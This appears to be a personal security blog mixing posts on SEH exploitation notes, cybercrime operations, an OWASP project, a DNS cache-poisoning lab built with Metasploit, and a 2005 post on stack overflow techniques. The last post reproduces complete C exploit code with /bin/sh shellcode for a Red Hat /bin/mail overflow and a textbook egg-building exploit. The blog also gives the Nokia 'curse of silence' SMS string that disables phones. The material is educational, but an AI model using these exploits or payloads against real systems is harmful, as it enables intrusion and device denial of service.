Rick’s Playground

POP POP RET - Sample assembly pattern for exploiting SEH based vulnerability. After too much high level dealing with  IS risk, metrics, governance, I found myself a nice SEH exploit development tutorial from Corelan Team to fulfill my itchiness to the geeky stuff. Here it is - Link

Nice neat stuff with actual vulnerable application - the SORITONG mp3 player. ( I couldn’t find the original application package anywhere else so I just registered on the Corelan team site and downloaded the application.) Just a few notes in order to have a full working exploit:

1. Make sure you use the memdump method (the 2nd method in the tutorial) when you try to locate a POP POP RET assembly pattern. I couldn’t locate any usable POP POP RET from the player.dll and end up with a “POP POP RET” in address 0×42103cdc. I am yet to determine whether this is a portable address or just hardcoded in my own XP machine.

2. Only “POP EDI POP ESI RET” will work and if register EBX or EBP are involved and your exploit will likely to be broken. I still need to figure out what’s the exact reason but I guess by poping to EBX or EBP will change the stack segment.

BTW time to go back to explore new features in Metasploit and I haven’t got a chance to explore in depth after it was acquired by Rapid7. I decide to play with a few fuzzing tools before coming back to exploits writing just to make sure I am not getting bored.

Recently th security industry becomes more and more exciting and “cool” with various 007 style secret operations.

“Operation Dynamaphone” - Aug 3, two-day operation by UK and Ireland police to crack down a group of six individuals for pilfering funds from 10000 online banking accounts through phishing emails. 

“Operation Pin Pad” - April 16 2010 Brazil PoS (Point-of-Sale)  Hack

“Operation b49″ -  Feb 2010  A coordinated effort of taking down Waledac Botnet by Microsoft along with supporting experts from Shadowserver, the University of Washington, Symantec and others.

“Operation Aurora” - Quote from wiki

Operation Aurora is a cyber attack which began in mid-2009 and continued through December 2009.The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China.

The attack was named “Operation Aurora” by Dmitri Alperovitch, Vice President of Threat Research at cyber security company McAfee. Research by McAfee Labs discovered that “Aurora” was part of the file path on the attacker’s machine that was included in two of the malware binaries McAfee said were associated with the attack. “We believe the name was the internal name the attacker(s) gave to this operation,” McAfee Chief Technology Officer George Kurtz said in a blog post.

“Operation Bot Roast” - June 2007 - An initiative from FBI to track down Botnet owners and subsequently a number of high profile charges are made against Botnet owners globally.

Finally I decided to give it a push and placed this part-time toy project to a bigger stage. I have registered this project with OWASP and I am pleasantly surprised by the level of support and encouragement from the OWASP folks. So here it goes - OWASP Security Assurance Testing of Virtual Worlds Project.

This project is aiming at creating a systematic and structural security framework for Virtual Worlds users (the gamers), third-party testers and developers. We already have very good security framework for generic application security (such as the OWASP Testing Guide), it’s time to zoom to specific category of application and in this case - Virtual Worlds created by in various MMORPG (Massively Multi-player Online Role Playing Games). If you ask me why I choose this specific type of application, I will say that I have this vision that one day or even in near future, virtual worlds will be an extension of real world. They will just like any independent nations with their own economy, laws and regulations, political systems and social structures. A very simple example is that we may see virtual currency come into the real world FX trading - we may see currency pair like USDLID (LID -> Linden $ currency in Second World) or USDISK (ISK -> currency in Eve-online). This is definitely very exciting stuff and worth the efforts from all of us.

Lastly quote a paragraph from Steve Jobs’ convocation speech (Stanford) -

“You can’t connect the dots looking forward; you can only connect them lookign backwards. So you have to trust that the dots will somehow connect  in your future. You have to trust in something your gut, destiny,life,karma, whatever because believing that the dots will connect down the road will give you the confidence to follow your heart, even when it leads you off the wellworn path, and that will make all the difference.”

I can’t believe this is the first entry in my blog for the past 6 month and we are more than half way through year 2009. It has been … ‘busy’… (err.. i tend to not use this word because everyone is busy and it’s not really justifiable due to the very diverse scale of measurement ..) Anyway I have been travelling around the Asia Pacific region, meeting people from very different cultural background, professions, ways of thinking and life styles. It is fun although there is frastration, boredon and stress. That’s part of parcel for life anyway.

The only reason which triggers me to sit down and write down this post is the inspiration after reading a couple of articles in one of the backlog ISACA Journals. In the “HelpSource Q&A” session, there is a question on how to fight phishing attacks for online banking applications.  Although I have been dealing with process-level controls for the past year, the words “attacks”, “applications”, “phishing” just trigger the technical geeky style of problem-solving thinking in me and ideas of strong 2-factor authentication, SPF (Sender Policy Framework), gateway spam filtering etc immediately come into the picture.

However the very first key control suggested is to have a properly defined e-mail communication policy for both sending and receiving emails to and from customers. Subsequently the advice mentioned a number of very good business process improvement which take fighting spam/phishing emails into consideration. A few small changes to a business process will easily mitigate bunch of relevant security issues which technology alone finds them difficult to tackle. It reminds me of those days when great amount of efforts and resources were spent on network level controls in order to fight application level security issues.  Are we in the same situation nowadays while we are spending too much efforts in creating application level or even information security process level controls in order to tackle business process level security issues?

I believe it’s time to introduce business process security into the information security model and make it a layer-8 practice. It just like buiding security into SDLC and we shall build security into a business process from the very begining. The thought of having a whole new paradigm in the information security model is really exciting. I am sure this will bring drastic changes to the infosec industry - probably soon we will see business process level security penetration testing, business process hardenning etc .

I have to admit that the recent malwares like Storm, Conficker have really impressed me - the various top-notch feature implementations and the strong skills and knowledges demonstrated. If you still think the malware developers are the bunch only knows to package published vulnerability POCs and inserts the payloads into the out-dated templates, you probably are still living in the pre-2004 era.  yeah, that’s not very long ago, but long enough for the information security industry to get rid of a bunch of old concepts and ideas.. Here is the original description from SRI about the Conficker worm - Conficker Write-up .

One of the quoted paragraph from this write-up realy sends a chill down the spine for most infosec folks.

“Finally, we must also acknowledge the multiple skill sets that are revealed within the evolving design and implementation of Conficker.  Those responsible for this outbreak have demonstrated Internet-wide programming skills, advanced cryptographic skills, custom dual-layer code packing and code obfuscation skills, and in-depth knowledge of Windows internals and security products.  They are among the first to introduce the Internet rendezvous point scheme, and have now integrated a sophisticated P2P protocol that does not require an embedded peer list.  They have continually seeded the Internet with new MD5 variants, and have adapted their code base to address the latest attempts to thwart Conficker.   They have infiltrated government sites, military networks, home PCs, critical infrastructure, small networks, and universities, around the world.  Perhaps an even greater threat than what they have done so far, is what they have learned and what they will build next.”

While we - the infosec folks are happily talking about nice-looking process, management, frameworks etc.. indulging ourselves in various fanciful security solutions which are full of marketing hoohaaas. We seems to forget about the fundermentals. Probably we need some form of wake-up call - before it is too late.

Nokia ‘curse of silence’ sms details are released by Tobias Engel.  It is a simple sms like ‘123456789@123456789.1234567890123′ sent as email format from most mobiles. Once you recieve this sms in your vulnerable nokia smart phone (most symbian S60s), it’s a gone case. Factory reset is required.

Exploits details:

http://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-advisory.txt

Last Thursday I  gave a presentation on Dan Kaminsky’s recent DNS finding to the local security meetup group folks. It has been a while since the previous time I laid my hands on network packets analysis, tweaking a bind9 server and even backtrack 3 looks fresh and interesting to me again.

Initially I thought it would be a huge task to set up a full POC environment of the DNS attack. I was planning and thinking about all the details such as the race conditions, full-function attacker controlled DNS server, segregation of testing environment. However the more I plann, the messier it becomes and until a point which I told myself - forget about it, this is not a huge corporate project which you need all the planning, risk analysis etc etc .  Let’s just be a normal script kiddy - get an available exploits, understand it and set up a minimum environment to try it, if it works, that’s it.   If it doesn’t work, then we analyze what the problem is. This turned out to be a fanatasic plan and again all my old friends - VMware, Ubuntun, Metasploit, Wireshark and Backtrack came into rescue.  Here is the simple but fully workable setup (all in one Lenonvo T61 laptop) :

Vulnerable DNS server

• Ubuntu 8.04 LTS Desktop Edition in VMware (server 1.06)
• IP address: 192.168.1.13
• with Bind9 packages installed
• A little tweaking of the named options (fixed query source port and allow recursion to the attacker’s subnet, see attached named option files)

Attacker machine

• Backtrack 3 Final in VMware (This is availabe directly from the home page, you don’t need to install into harddisk anymore)
• IP address: 192.168.1.24
• Update your Metasploit to make sure the auxiliary/spoof/DNS/bailiwicked_host” is available

Client PC

• Windows XP (The host machine which has the vmware-server installed)
• IP address: 192.168.1.4
• It just serves as a poor third-party DNS client who queries the vulnerable DNS server for IP info

The successful rate for the POC is quite high,  more than 70% of the spoof attacks (using the Metaslpoit module)  were able to successfully inject the records to the vulnerable DNS server within 20 minutes.  I have attached a copy of Metasploit screen output and a corresponding wireshark traffic dump for one of the POC attacks - make the vulnerable DNS server point www.jpmorgan.com point to ip address 192.168.1.226.

The POC for this attack is pretty safe because the traffic is only routed within the LAN except the initial target DNS nameservers list queries. Anyway the initial queries are harmless at all because they are just normal DNS query to a third party DNS server.   Lastly the Metasploit’s check for recusive DNS server is a bit buggy.  It throws out false-negative and always consider the target vulnerable DNS “not vulnerable”.  I am yet to find out the reason.

Bind9 Named Config Options:  namedconf.options

Metasploit Console Output: msf_output_jpmorgan

Meetup Slides: understand-kaminskys-dns-attacks-oct-2008.ppt

Fresh from the oven !!! wondering where did our deal friend Michael manage to source these treasure …

Full Set of Blackhat 2008 Vegas Conference Presentation Slides

Recently we have seen some rapid growth of information security topics in virtual world, typically relating to MMORPGs and both good and bad. For example World of Warcraft is getting bank-like security while Game Trojans outscore Storm worm.  It has been almost a year since I kicked off my part-time hobby research project on MMORPG security. The progress is rather slow but I am really enjoying the exploring process. It’s really amazing to witness the evolving process of all the virtual worlds. Here are a couple of MMORPG security discussion topics I have raised among the local infosecurity interest groups.

• MMORPG - InfoSec Research Nov 2007
• MMORPG - InfoSec Research Mar 2008

Based on the current trend, more and more MMORPGs are no longer “game” and they become a special type of social communities. There is a newly published research survey from CNNIC(China Network Information Centre). Majority of the users consider the virtual world is a community and have a sense of identity and belongings.

Fig 1. The meanning of a MMORPG to users

Fig 2. What are the factors of an MMORPG most valued by the users

This change of users perception towards MMORPGs also reflect the growing importance of information protection to the virtual world and remind the gaming industry to take it very seriously.

This is another old post from my old forum. It reminds me of those exploits writing days! One day I will be back.

Posted: Tue Dec 13, 2005 10:56 pm
Post subject: Some notes taken when reading on stack overflow attacks

Summary of Stack Overflow Techniques

Basics

Memory Layout Stack Area Operation

bottom of memory                                   	 top of memory
             buffer2    buffer1     sfp(EBP)   ret   a     b     c   

<------   [            ][        ][         ][    ][    ][    ][    ]   

top of stack (ESP)						bottom of stack

1. Put the shellcode in the environment

• This is commonly used in case when buffer is too small to put shellcode and return address or the stack is non-executable
• The linux environment address is fixed at 0xbffffffa, thus we can find the address of the shellcode placed in the environment.
• In this case, the return address is at 0xbfffffce. Using a “x/35b 0xbfffffce”, you will see the shellcode nicely placed in the memory.

/* Rick the following code is used to exploit the /bin/mail program in RH9, the cc field buffer size is 8214*/

/*

redhat 9.0 and some others linux have this vul.

#/bin/mail -s test -c `perl -e print “A”x9000′` root@localhost,you can see something wrong.

#I write this exploit just for fun ,because “mail” have not suid.

code by OYXin (www.ph4nt0m.net)

*/

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#define BUFSIZE 8214

/*shellcode form s0t4ipv6@shellcode.com.ar*/

char shellcode[] = “\x31\xc0\x50\x68\x2f\x2f\x73\x68″

“\x68\x2f\x62\x69\x6e\x89\xe3\x89″

“\x64\x24\x0c\x89\x44\x24\x10\x8d”

“\x4c\x24\x0c\x8b\x54\x24\x08\xb0″

“\x0b\xcd\x80″;

int main(void)

{

char buf[BUFSIZE+16];

char *prog[] = {”/bin/mail”,”-s”,”TEST”,”-c”,buf,”root@localhost”, NULL};

char *env[] = {”HOME=OYXin”, shellcode, NULL};

unsigned long ret = 0xc0000000 - sizeof(void *) - strlen(prog[0]) - strlen(shellcode) - 0×02;

/*unsigned long ret=0xbffffffa - strlen(prog[0] - strlen(shellcode) */

memset(buf,0×41,sizeof(buf));

memcpy(buf+BUFSIZE,(char *)&ret,4);

memcpy(buf+BUFSIZE+4,(char *)&ret,4);

memcpy(buf+BUFSIZE+8,(char *)&ret,4);

buf[BUFSIZE+12] = 0×00;

execve(prog[0],prog,env);

return 0;

}

/* you must enter “.” and a return to get a shell.*/

• Another common seen situation is to put the shellcode in the environment manually (by export a perl generated strings etc) , then pass it to the vulnerable program as arguments.

A small program can help you get the environment variable address. For each 1 char longer in the executable file name, the address will be differ by 2 bytes. (Don’t forget the stack grows to lower memory space :P)

#include <stdlib.h>

int main(int argc, char *argv[])

{

char *addr;

if (argc < 2)

{

printf(”Usage:\n%s <environment variable name>\n”,argv[0]);

exit(0);

}

addr=getenv(argv[1]);

if(addr == NULL)

printf(”The environment variable %s doesn’t exist.\n”,argv[1]);

else

printf(”%s is located at %p\n”,argv[1],addr);

return 0;

}

• Put the Shellcode in the stack

This is the most “traditional” way introduced in the alpha’s “smash the stack for fun and profit”. However it becomes ineffective in newer version of various OS due to various protection techniques implemented. The general idea is:

- Construct an EGG with NOP padding, shellcode in the centre and return address (to the shellcode or NOP padding) in the last part of the EGG. (From Rick: EGG sounds cuter and a nice name.. don’t know who is the first one thought of this idea?)
- The guessing of return address will be tricky. (see below code which create target at the vulnerable.c , it creates the EGG, put the EGG in a envrionemnt variable and later use it as an argument to the vulnerable.c)

However this code is not effective on Redhat 9.0 kernel 2.4.20-31.9 because the stack pointer (ESP) is not static in this kernel. It is dynamic and random to certain extent based on the process number.

/*this is the vulnerable.c*/

int main(int argc, char **argv[]) {

char little_array[512];

if (argc > 1)

strcpy(little_array,argv[1]);

}

/*end of the vulnerable.c*/

/* This is the exploits */The Shellcoder's Handbook: Discovering and Exploiting Security

HolesJack Koziol, David Litchfield, Dave Aitel, Chris Anley,   

Sinan Eren, Neel Mehta, Riley Hassell   

Publisher: John Wiley & Sons   

ISBN: 0764544683Chapter 2: Stack Overflows   

Sample Program #6   

Please send comments/feedback to jack@infosecinstitute.com or visit

http://www.infosecinstitute.com   

*/   

#include <stdlib.h>   

#define offset_size                    0   

#define buffer_size                    512   

char sc[] =   

"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"   

"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"   

"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";   

unsigned long find_start(void) {   

__asm__("movl %esp,%eax");   

}   

int main(int argc, char *argv[])   

{   

char *buff, *ptr;   

long *addr_ptr, addr;   

int offset=offset_size, bsize=buffer_size;   

int i;   

/*the missting memory allocation code in the orignal code, maybe just a printing error,

by Rick */   

if (!(buff=malloc(bsize))) {   

printf("Can't allocate memory.\n");   

exit(0);   

}   

if (argc > 1) bsize  = atoi(argv[1]);   

if (argc > 2) offset = atoi(argv[2]);   

addr = find_start() - offset;   

printf("Attempting address: 0x%x\n", addr);   

ptr = buff;   

addr_ptr = (long *) ptr;   

for (i = 0; i < bsize; i+=4)   

*(addr_ptr++) = addr;   

ptr += 4;   

for (i = 0; i < strlen(sc); i++)   

*(ptr++) = sc[i];   

buff[bsize - 1] = '\0';   

memcpy(buff,"BUF=",4);   

putenv(buff);   

system("/bin/bash");   

}

• Return to libc